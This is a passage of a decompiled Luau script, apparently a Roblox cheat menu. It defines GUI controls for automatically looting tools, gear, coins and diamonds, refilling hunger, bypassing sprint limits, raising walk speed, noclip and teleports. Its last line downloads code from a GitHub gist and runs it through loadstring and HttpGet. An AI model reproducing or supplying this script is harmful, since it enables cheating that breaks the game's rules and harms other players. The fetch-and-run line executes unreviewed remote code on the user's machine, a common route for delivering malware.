    Name = "Tools",
  })
  r58_1:CreateButton({
    Name = "Take Tools",
    Callback = function()
      -- line: [0, 0] id: 51
      r32_1()
    end,
  })
  r58_1:CreateToggle({
    Name = "Auto Take Tools",
    Default = true,
    Save = true,
    Flag = "AutoTakeTools",
    Callback = function(r0_83)
      -- line: [0, 0] id: 83
      r45_1.AutoTakeTools = r0_83
      task.spawn(function()
        -- line: [0, 0] id: 84
        while r45_1.AutoTakeTools do
          r32_1()
          task.wait(0.1)
        end
      end)
    end,
  })
  r58_1:CreateSection({
    Name = "Gears",
  })
  r58_1:CreateButton({
    Name = "Wear Armours",
    Callback = function()
      -- line: [0, 0] id: 13
      r33_1()
    end,
  })
  r58_1:CreateButton({
    Name = "Take Ammos",
    Callback = function()
      -- line: [0, 0] id: 16
      r34_1()
    end,
  })
  r58_1:CreateToggle({
    Name = "Auto Take Gears",
    Default = true,
    Save = true,
    Flag = "AutoTakeGears",
    Callback = function(r0_42)
      -- line: [0, 0] id: 42
      r45_1.AutoTakeGears = r0_42
      task.spawn(function()
        -- line: [0, 0] id: 43
        while r45_1.AutoTakeGears do
          r33_1()
          r34_1()
          task.wait(0.1)
        end
      end)
    end,
  })
  r58_1:CreateSection({
    Name = "Preciouses",
  })
  r58_1:CreateButton({
    Name = "Collect Coins",
    Callback = function()
      -- line: [0, 0] id: 49
      r35_1()
    end,
  })
  r58_1:CreateButton({
    Name = "Collect Diamonds",
    Callback = function()
      -- line: [0, 0] id: 48
      r36_1()
    end,
  })
  r58_1:CreateToggle({
    Name = "Auto Collect Preciouses",
    Default = true,
    Save = true,
    Flag = "AutoCollectPrec",
    Callback = function(r0_92)
      -- line: [0, 0] id: 92
      r45_1.AutoCollectPrec = r0_92
      task.spawn(function()
        -- line: [0, 0] id: 93
        while r45_1.AutoCollectPrec do
          r35_1()
          r36_1()
          task.wait(0.1)
        end
      end)
    end,
  })
  r58_1:CreateSection({
    Name = "Hunger",
  })
  r58_1:CreateButton({
    Name = "Fill Hunger",
    Callback = function()
      -- line: [0, 0] id: 27
      r38_1()
    end,
  })
  r58_1:CreateToggle({
    Name = "Auto Fill Hunger",
    Default = true,
    Save = true,
    Flag = "AutoFillHunger",
    Callback = function(r0_7)
      -- line: [0, 0] id: 7
      r45_1.AutoFillHunger = r0_7
      task.spawn(function()
        -- line: [0, 0] id: 8
        while r45_1.AutoFillHunger do
          r38_1()
          task.wait(0.3)
        end
      end)
    end,
  })
  r59_1:CreateToggle({
    Name = "Bypass Sprint",
    Default = true,
    Save = true,
    Flag = "bypsSprint",
    Callback = function(r0_26)
      -- line: [0, 0] id: 26
      r45_1.bypsSprint = r0_26
    end,
  })
  local r65_1 = nil
  local r66_1 = nil
  r65_1 = r59_1:CreateToggle({
    Name = "Walkspeed",
    Default = false,
    Save = true,
    Flag = "WalkspeedTog",
    Callback = function(r0_70)
      -- line: [0, 0] id: 70
      task.spawn(function()
        -- line: [0, 0] id: 71
        if not r66_1 then
          repeat
            task.wait()
          until r66_1
        end
        r53_1(r0_70, r66_1:GetValue())
      end)
    end,
  })
  r66_1 = r59_1:CreateSlider({
    Name = "WalkSpeed",
    Min = 0,
    Max = 200,
    Default = 16,
    Save = true,
    Flag = "WalkSpeedSlid",
    Callback = function(r0_61)
      -- line: [0, 0] id: 61
      task.spawn(function()
        -- line: [0, 0] id: 62
        if not r65_1 then
          repeat
            task.wait()
          until r65_1
        end
        if r65_1:GetToggle() then
          r53_1(true, r0_61)
        else
          r53_1(false, r0_61)
        end
      end)
    end,
  })
  r59_1:CreateToggle({
    Name = "Noclip",
    Default = false,
    Save = false,
    Flag = "noClipping",
    Callback = function(r0_59)
      -- line: [0, 0] id: 59
      r45_1.noClipping = r0_59
    end,
  })
  r61_1:CreateButton({
    Name = "Camp",
    Callback = function()
      -- line: [0, 0] id: 53
      r41_1()
    end,
  })
  r61_1:CreateButton({
    Name = "Castle",
    Callback = function()
      -- line: [0, 0] id: 87
      r42_1()
    end,
  })
  r61_1:CreateButton({
    Name = "A Lost Child",
    Callback = function()
      -- line: [0, 0] id: 52
      r43_1()
    end,
  })
  local r67_1 = r62_1:CreateLabel({
    Message = "Hunger: " .. math.round(r6_1:GetAttribute("Hunger")),
  })
  r6_1:GetAttributeChangedSignal("Hunger"):Connect(function()
    -- line: [0, 0] id: 2
    r67_1:SetText("Hunger: " .. math.round(r6_1:GetAttribute("Hunger")))
  end)
  r63_1:CreateSection({
    Name = "Settings",
  })
  r63_1:CreateHotKey({
    Name = "Hide/Open",
    Default = "H",
    Save = true,
    Flag = "Hide/Open",
    Callback = function()
      -- line: [0, 0] id: 41
      r57_1:Hide()
    end,
  })
  Library:Init()
end
local r0_0 = clonefunction
r0_0(loadstring)(r0_0(game.HttpGet)(game, "https://gist.githubusercontent.com/MrTomatoesM/d5f718e69fb790dc1237aeecaf47d7a0/raw/Key%2520System"))()
